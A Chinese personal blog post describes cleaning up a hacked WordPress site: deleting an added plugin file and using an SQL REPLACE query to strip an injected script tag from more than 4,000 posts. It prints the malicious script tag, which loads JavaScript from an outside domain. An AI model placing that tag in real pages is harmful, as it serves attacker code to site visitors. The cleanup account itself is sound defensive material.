专注于
美好质感事物的记录

网站被黑,被挂马

我有很久没怎么写过东西了,舒适的环境,人总是会堕落。

前天网站打开后总是跳转到其他页面,我第一时间就联系空间商,他告诉我是我的程序被黑了,可那正是双12,我也是忙的不行,每天也只能送完货不休息来找问题出在哪里。

网站被黑,被挂马

网站打开后跳转成这个页面

我很久没在家里长时间坐在电脑旁了,媳妇问我怎么了,我说网站被黑了,媳妇婉儿一笑的说,你的网站都有人黑啊,我憨憨的一笑,笑称让人家看的起了。

这段时间,很少看别的网站的内容,就仅仅是从吧哥博客知道43626网域名被污,心想对于人家,自己的博客被黑就是小菜了。

网站出现被挂马了,如何来一步步恢复呢?

如果有备份,直接恢复备份,没有的话,请看下面操作。

在你准备大干一场的时候,还是先全部备份下吧,否则就等着抹眼泪吧!

打开空间后台,选择时间修改顺序,看下有没有最新修改的文件,我因为程序一直没升级,模板也没是几年没变过,所以很容易找到最近修改的文件,我发现模板插件多了一个文件

网站被黑,被挂马

直接删除这个文件夹里的所有文件,再重新打开网站,发现可以打开网站了,只是加载很慢,我知道还有其他问题。

继续搜索是否有修改的地方,程序方面是没有了,网站问题还没有解决,那么就只有可能是数据库方面的了。

其实,对程序还有数据库,我都不是太懂,也仅仅是会点点点,但为了能解决问题,还是需要去看看的,我发现在wp_posts这个表里,所有的内容最后都加了一段代码:

<script type=”text/javascript” src=”https://https://port.transandfiestas.ga/js.php?from=l&sid=346″></script>

也就是所有的文章都被挂马,我不可能一个一个的手工删除,4000多条数据,会累死我,数据库里有个搜索功能,可是一直搜索不到内容,最后才明白是需要转换下语句才可以搜索。

这是SQL语句:

UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`, ‘<script src=\’https://https://port.transandfiestas.ga/js.php?s=q\’ type=\’text/javascript\’></script>‘, ”) WHERE `post_content` LIKE ‘%<script src=\’https://https://port.transandfiestas.ga/js.php?s=q\’ type=\’text/javascript\’></script>%’ COLLATE utf8mb4_bin

注意红色部分的不同,用搜索的话是输入红色转换好的格式。

就这样全部解决,也就几分钟的事情。

这次网站被挂马,让我明白了几件事情

1、定期备份,很重要。

2、程序有最新的就升级

3、密码改的复杂下,最好是自己也记不住。

具体是怎么入侵的,我也不明白,我只是一个小站,也不知道入侵来干什么。

Today on history:

  1. 2016:  定位好自己(2)
未经允许不得转载:麦林风博客 » 网站被黑,被挂马

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

麦林风,小项目,一直在实操

联系我们联系我们